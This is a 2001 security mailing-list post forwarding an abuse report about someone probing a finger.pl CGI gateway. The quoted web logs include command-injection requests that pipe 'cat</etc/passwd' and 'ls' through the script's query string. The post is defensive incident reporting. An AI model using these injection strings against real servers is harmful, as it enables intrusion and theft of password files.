(no subject)

From: Len Sassaman (rabbiat_private)
Date: Wed May 09 2001 - 16:41:19 PDT

Next message: Bob Johnson: "Re: IIS Exploit..."

Previous message: Gregory McCann: "Re: What "methods" are being used"
Next in thread: Daniel Docekal: "(no subject)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I sent the following email to several CNET contacts last week regarding
atttempts to obtain one of my server's /etc/passwd file. I got no response
from CNET, and I am curious to know if anyone else is being probed in this
way.

--Len.

---------- Forwarded message ----------
Date: Thu, 3 May 2001 12:42:45 -0700 (PDT)
From: abuseat_private
To: hostmasterat_private, domain-adminat_private
Cc: sashapat_private

Dear CNET Admins,

It appears that a user on your network is attempting to exploit a
vulnerability in HTTP-to-finger gateways. I discovered, in the below
quoted logs, what looks to be an attempt to get our webserver to execute
local commands and print the output to the web page. (Your user searched
google.com for the finger.pl script, then attempted to view our passwd
file and directory listings, ostensibly so that he could crack legitimate
users' passwords and gain shell access to the system.).

While this individual was not successful in his attempt on our system, he
may be doing this to other systems as well.

Please let me know what action you are taking to prevent this from
occurring in the future. Also, please preserve all logs, IP assignments,
and other data you have pertaining to this incident while it is being
investigated. I would appreciate a response today, if possible.

Thank you,

Len Sassaman

86-241.cnet.com - - [02/May/2001:17:15:11 -0700] "GET
/cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040
"http://www.google.com/search?as_q=&num=10&btnG=Google+Search&as_epq=finger.pl&as_oq=&as_eq=&as_occt=url&lr=&as_dt=i&as_sitesearch=&safe=off"
"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:23 -0700] "GET /cgi-bin/finger.pl?
HTTP/1.1" 200 357 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)"
86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET
/cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET
/cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET
/cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 "-" "Mozilla/4.0 (compatible;
MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET
/cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"

Next message: Bob Johnson: "Re: IIS Exploit..."
Previous message: Gregory McCann: "Re: What "methods" are being used"
Next in thread: Daniel Docekal: "(no subject)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 10 2001 - 17:02:32 PDT